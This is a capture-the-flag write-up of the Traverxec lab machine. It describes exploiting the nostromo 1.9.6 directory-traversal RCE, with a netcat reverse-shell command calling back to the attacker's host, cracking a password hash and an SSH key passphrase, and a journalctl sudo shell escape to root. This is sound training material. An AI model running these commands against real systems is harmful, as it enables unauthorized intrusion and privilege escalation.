# TRAVERXEC | 10.10.10.165

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.165
    
### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.9p1 Debian 10
* 80 - HTTP - nostromo 1.9.6

## Service Enumeration

### 22 - SSH

Your standard SSH setup. Maybe we'll use this later if we get credentials.

### 80 - HTTP - nostromo

This is a simple one page website, and a directory search did not yield anything:

![](img/port-80.png)
![](img/dirsearch.png)

However, the real standout is the web server that is running. Normally you see Apache or nginx if it is a Linux machine, and perhaps IIS if it is a Windows machine. So while the dirsearch was running I searched Google for 'nostromo 1.9.6 exploits' and got a hit right away, a [python-based exploit](https://www.exploit-db.com/exploits/47837) that uses a directory-traversal vulnerability to run malicious code. So let's try it out.

## Exploitation - CVE-2019-16278

![](img/nostromo-CVE.png)

You can see it is a relatively simple exploit that lets you run simple shell commands, so I will first try to make sure the exploit works by running something simple (ie `id`):

![](img/RCE.png)

As you can see, after I told it to use python2 it worked and the server is run as the user 'www-data'. The next step is to get a reverse shell connection. After running `nc -h` through the exploit I can tell that the machine has netcat and the version that allows command execution, so injecting a netcat reverse shell command should work here:

    python2 ns-RCE.py 10.10.10.165 80 "nc -e /bin/bash 10.10.14.21 6969"
    
And in a second I have a shell:

![](img/www-data-shell.png)

I can't view the flag yet however. That will have to come after some kind of privesc.

## User Enumeration

I am the 'www-data' user so my privileges are pretty slim. After downloading linpeas it found a hash belonging to the actual user, david:

![](img/david-htpasswd.png)

After realizing my hashcat installation really is not gonna work on this laptop right now, I sent it over to my desktop machine (which can use it's graphics card) and ran hashcat there, which cracked the hash in seconds:

![](img/cracked-hash.png)

So, now it is time to try logging into SSH with these creds.

![](img/ssh-denied.png)

OK that did not go as expected. I also tried the command `su david` from my shell, to no avail. So it's one of those situations in which SSH is open but so far it is a red herring.

One thing struck me though, in the nostromo configuration file, and that was a reference to 'homedirs', so I googled 'nhttpd conf homedirs' and it took me to a nostromo man page, which explained the _homedirs_ to me: if enabled in the config, then user's home directories could be accessible from the internet! And I (probably) have the password!

![](img/homedirs.png)

OK let's see if anything is there:

![](img/private.png)

Cute. In the nostromo conf file there is also a reference to 'homedirs_public', which according to that manpage is the only publicly accessible folder if defined. So I tried it in the browser and got a 404, but then remembered I could also try it from my shell, as the www-data user (in the browser I am no user at all):

![](img/protected.png)

Interesting! I extracted the archive (using tar) into somewhere I could write (`/dev/shm`) and pulled out david's private ssh key. It was encrypted so I used `ssh2john` to convert it to a hash and then proceeded to crack it using john:

![](img/david-pw.png)

Even worse than 'hunter2'.

OK, so now let's try logging in as david via SSH:

![](img/david-shell.png)

Finally.

### Flag

![](img/david-flag.png)

## User Enumeration/Privilege Escalation

I'm not finished. I need to get root access in order to actually own the machine. In his home folder, david has a dir called 'bin' and inside that is a script that does some simple collection of server stats for the nostromo server we see on port 80. From the looks of it we see that david can run journalctl as root!

![](img/stats-sh.png)

Checking the invaluable resource [GTFObins](https://gtfobins.github.io/gtfobins/journalctl/) shows me a simple method to get privilege escalation:

![](img/journalctl-gtfo.png)

So let's try it:

    /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
    !/bin/bash

![](img/root-shell.png)

Now I am root!

### Flag

![](img/root-flag.png)


## Conclusion

This was a box that reminded me to do more research; if I can't find my way through while in the machine, then I should spend some time looking externally to find out my next course of action. Researching the options in the nostromo config file is what led me to privilege escalation from www-data to david. The privesc from david to root was trivial in comparison, pretty much boilerplate Linux privesc.

Steps taken:
* Exploit directory traversal vuln in nostromo 1.9.6 to execute malicious code that gave me a reverse shell as www-data user
* Read through nostromo config file to discover one accessible in david's home dir that contained SSH keys; login using private key
* Escalate to root via shell escape in journalctl, that david was allowed to run as root.
